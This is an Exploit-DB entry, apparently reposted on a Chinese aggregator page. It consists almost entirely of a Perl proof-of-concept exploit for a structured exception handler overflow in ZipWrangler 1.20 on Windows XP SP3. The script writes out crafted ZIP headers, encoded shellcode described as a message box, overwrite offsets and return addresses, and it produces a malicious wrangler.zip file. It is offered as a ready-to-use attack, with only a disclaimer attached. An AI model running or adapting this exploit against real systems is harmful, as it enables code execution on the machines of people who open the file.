ZipWrangler 1.20 – ‘.zip’ File (SEH)

• Exploit Database
• 119 阅读

• 作者： TecR0c & Sud0
  日期： 2010-04-24
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12368/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108

  #!/usr/bin/perl # Title:ZipWrangler 1.20 (.zip) SEH 0day exploit # Author: TecR0c & Sud0 # Date: April 24th, 2010 # Corelan Reference:http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031 # Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml # Platform: Windows XP sp3 En (VMWARE) # Greetz to:Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes. # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause.   print "|-------------------------------------------------------------------|\n"; print "| __ __ |\n"; print "| _________________/ /___ _____ / /________ _____ ___ |\n"; print "|/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \|\n"; print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / /|\n"; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n"; print "| |\n"; print "| http://www.corelan.be:8800|\n"; print "|security@corelan.be|\n"; print "| |\n"; print "|-------------------------------------------------[ EIP Hunters ]---|\n"; print "[+] ZipWrangler 1.2 (.zip) SEH exploit\n";       my $ldf_header = "\x50\x4B\x03\x04". # local signature "\x14\x00". # version minimum needed to extract "\x00\x00". #general purpose bit flag "\x00\x00". #compression method "\xB7\xAC". #file last modification time "\xCE\x34". # file last modification date "\x00\x00\x00\x00". #CRC32 "\x00\x00\x00\x00". #Compressed size "\x00\x00\x00\x00" . #Uncompressed Size "\x48\x10" .# filename length E4 0F "\x00\x00"; #Extra filed length     my $cdf_header = "\x50\x4B\x01\x02". #Signature "\x14\x00".#version made by "\x14\x00".#version needed to extract "\x00\x00".#general purpose bit flag "\x00\x00".#Compression method "\xB7\xAC".#File last modification time "\xCE\x34".#File last modification date "\x00\x00\x00\x00". #CRC32 "\x00\x00\x00\x00".#Compressed Size "\x00\x00\x00\x00".#Uncompressed Size# "\x48\x10". # filename length "\x00\x00". #Extra Field Length "\x00\x00". #File comment length "\x00\x00". #Disk number where File starts "\x01\x00". #Internal File Attributes "\x24\x00\x00\x00". #External File Attributes "\x00\x00\x00\x00"; #Relative offset of local file header;   my $eofcdf_header = "\x50\x4B\x05\x06". #End of central Directory Signature "\x00\x00". #Number of this disk "\x00\x00". #Disk where central directory starts "\x01\x00". #Number of central directory records on this Disk "\x01\x00". #Total Number of central directory records "\x76\x10\x00\x00". #Size of central directory (bytes) (central directory header size + payload) "\x66\x10\x00\x00". # Offset of start of central directory, relative to start archive(lfh + payload) "\x00\x00"; #Zip file Comment length;   #mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS #so EDX=0000, next instruction TEST EDX,EDX/ Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx]) #the jump will take us to a retn (so we are out from handler routine) --> come back to execution #0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception #bingo , after \xEB\x06 we are in our \xcc # shell = message box eax e   my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" . "ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" . "lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" . "JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" . "MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" . "dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" . "IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" . "4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" . "NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" . "iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" . "h5ZA";   my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "\x0C\xFD\xFD\x7F" . "\x90" x 4 . "\x5b\x02\xe9\x77" . "\x90" x 8 . "\x83\xC0\x16\xFF\xE0"."\xcc" x 59; my $filename="wrangler.zip";   my $payload = $shellcode . ".txt";   print "Size : " . length($payload)."\n"; print "Removing old $filename file\n"; system("del $filename"); print "Creating new $filename file\n"; open(FILE, ">$filename");   print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header; close(FILE);